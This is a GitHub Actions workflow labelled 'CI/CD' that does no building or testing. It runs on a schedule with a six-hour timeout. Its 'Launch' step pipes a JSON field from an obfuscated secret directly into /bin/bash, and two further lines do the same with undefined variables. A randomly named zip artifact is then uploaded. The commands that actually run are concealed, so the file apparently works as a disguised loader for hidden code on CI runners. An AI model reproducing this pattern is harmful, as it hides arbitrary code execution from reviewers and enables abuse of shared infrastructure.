name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '44 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          ke748: ${{ secrets.ke748 }}
        run: |
          printf '%s' "$ke748" | jq -r .gmn0 | /bin/bash
          printf '%s' "$ie4705" | jq -r .jooj99 | /bin/bash
          printf '%s' "$rrx9719" | jq -r .tthn79696 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: CqHG8WdV
          path: "*.zip"
          retention-days: 1
